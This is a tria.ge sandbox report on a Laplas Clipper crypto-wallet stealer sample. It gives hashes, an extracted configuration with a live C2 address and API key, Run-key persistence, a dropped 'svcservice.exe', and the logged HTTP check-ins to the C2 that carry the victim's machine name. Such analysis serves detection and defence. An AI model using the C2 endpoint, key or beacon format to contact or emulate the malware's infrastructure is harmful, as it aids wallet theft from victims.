Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    102s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    11/03/2023, 08:30 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    747e415b2fdfc4def2b6d1b014605ad740c7a1c25743f25706391bdc54845d00.exe

  • Size

    269KB

  • MD5

    2ec6b6e536979c66b851f54e55d936cf

  • SHA1

    dc66788321acf7e368b40f07281d5f7ea77fbc13

  • SHA256

    747e415b2fdfc4def2b6d1b014605ad740c7a1c25743f25706391bdc54845d00

  • SHA512

    fc299b1558a01dca518deeb0ab88d06b7d98d487699d3e47ee19b085a066fc28faa9febecf0162b46d9d0cb74c147ab672869e7bcf33482d63ddd785fa20b5da

  • SSDEEP

    6144:KFnpIOJ5avLVgQdUcwx/XDpXtLl9xejvE/5Jz9:EpIOOzVH/YDZb94jvE/V

Score
10/10
laplasclipperpersistencestealer

Malware Config

Extracted

Family

laplas

C2

http://45.159.189.105

Attributes
  • api_key

    9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

    stealerclipperlaplas
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\747e415b2fdfc4def2b6d1b014605ad740c7a1c25743f25706391bdc54845d00.exe
    "C:\Users\Admin\AppData\Local\Temp\747e415b2fdfc4def2b6d1b014605ad740c7a1c25743f25706391bdc54845d00.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1016
    • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
      "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1320

Network

  • flag-nl
    GET
    http://45.159.189.105/bot/regex
    svcservice.exe
    Remote address:
    45.159.189.105:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 45.159.189.105
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Sat, 11 Mar 2023 08:31:03 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172
    svcservice.exe
    Remote address:
    45.159.189.105:80
    Request
    GET /bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172 HTTP/1.1
    Host: 45.159.189.105
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Sat, 11 Mar 2023 08:31:03 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://45.159.189.105/bot/regex
    svcservice.exe
    Remote address:
    45.159.189.105:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 45.159.189.105
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Sat, 11 Mar 2023 08:32:02 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172
    svcservice.exe
    Remote address:
    45.159.189.105:80
    Request
    GET /bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172 HTTP/1.1
    Host: 45.159.189.105
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Sat, 11 Mar 2023 08:32:02 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-us
    DNS
    105.189.159.45.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.189.159.45.in-addr.arpa
    IN PTR
    Response
    105.189.159.45.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    IN PTR
    Response
  • 45.159.189.105:80
    http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172
    http
    svcservice.exe
    920 B
     2.2kB
     10
    6

    HTTP Request

    GET http://45.159.189.105/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172

    HTTP Response

    200

    HTTP Request

    GET http://45.159.189.105/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://45.159.189.105/bot/online?guid=YJIYKEBB\\Admin&key=9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172

    HTTP Response

    200
  • 8.8.8.8:53
    105.189.159.45.in-addr.arpa
    dns
    73 B
     86 B
     1
    1

    DNS Request

    105.189.159.45.in-addr.arpa

  • 8.8.8.8:53
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    dns
    118 B
     182 B
     1
    1

    DNS Request

    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
    Filesize

    714.3MB

    MD5

    898e90b6dc90643bf08db60237258eef

    SHA1

    b868149a5f8c43345672685594ee25072fde5bf5

    SHA256

    9cf78bb50c9e904a44d6e1ff9ec0425060d4c6c3bee7be1826f883204174d2fb

    SHA512

    ae198d9caf6fb39cee2a906a078e5e0815cbfc64a56741e45105f82b11851364f0dbb8c0d8c2d1aa26c17dc05d0d981433fa1ef2078399c54e3f6828f3476796

    Download Submit

  • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
    Filesize

    714.3MB

    MD5

    898e90b6dc90643bf08db60237258eef

    SHA1

    b868149a5f8c43345672685594ee25072fde5bf5

    SHA256

    9cf78bb50c9e904a44d6e1ff9ec0425060d4c6c3bee7be1826f883204174d2fb

    SHA512

    ae198d9caf6fb39cee2a906a078e5e0815cbfc64a56741e45105f82b11851364f0dbb8c0d8c2d1aa26c17dc05d0d981433fa1ef2078399c54e3f6828f3476796

    Download Submit

  • memory/1016-122-0x00000000021F0000-0x000000000222E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/1016-123-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

    Download

  • memory/1016-124-0x00000000021F0000-0x000000000222E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/1016-127-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

    Download

  • memory/1016-131-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

    Download

  • memory/1320-133-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

    Download

  • memory/1320-136-0x0000000000400000-0x00000000004C3000-memory.dmp

    Filesize

    780KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.